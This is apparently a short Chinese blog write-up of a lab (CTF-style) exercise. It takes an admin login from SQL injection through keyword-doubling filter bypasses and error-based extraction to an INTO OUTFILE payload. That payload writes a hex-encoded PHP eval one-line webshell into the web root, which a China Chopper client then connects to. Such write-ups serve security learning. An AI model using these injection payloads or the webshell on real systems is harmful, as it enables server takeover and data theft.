sql注入马

原理:利用了数据库是能够写文件的。

 

语法:Select '文件的内容' into outfile '文件的路径'

 

select 'ctsz1' into outfile 'c:/WWW/ctsz1.txt'

 

靶场sql-注入绕过防护getshell

输入admin发现有管理员后台

正常输入显示密码不正确

后面加个单引号报错了

使用order by 探测字段长度,最终探测长度为5

order by 5

order by 6

爆数据库名时and被过滤,采用空格+双写绕过:

admin' an and d updatexml(1,concat(0x7e,select database(),0x7e),1)#

 

然后注入码

admin' uni union on selselectect null,null,null,null,0x3c3f706870206576616c28245f524551554553545b385d293f3e in into outoutfilefile 'D:/phpStudy/WWW/bees/ctsz1.php'--+

 

一句话木马:<?php eval($_REQUEST[8])?> --> 16编码(HEX转换)转换:0x3c3f706870206576616c28245f524551554553545b385d293f3e

然后用菜刀进行连接

 

发现flag 提交

posted @   Ctsz1丶  阅读(76)  评论(0编辑  收藏  举报
相关博文:
· SQL注入进入后台+一句话木马
· SQL注入
· sql注入之文件的读写------上传一句话木马
· 实战篇——SQL注入sqli-labs-master靶场实战二
· sql注入总结
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 一文读懂知识蒸馏
· 终于写完轮子一部分:tcp代理 了,记录一下

阅读目录(Content)

此页目录为空

点击右上角即可分享
微信分享提示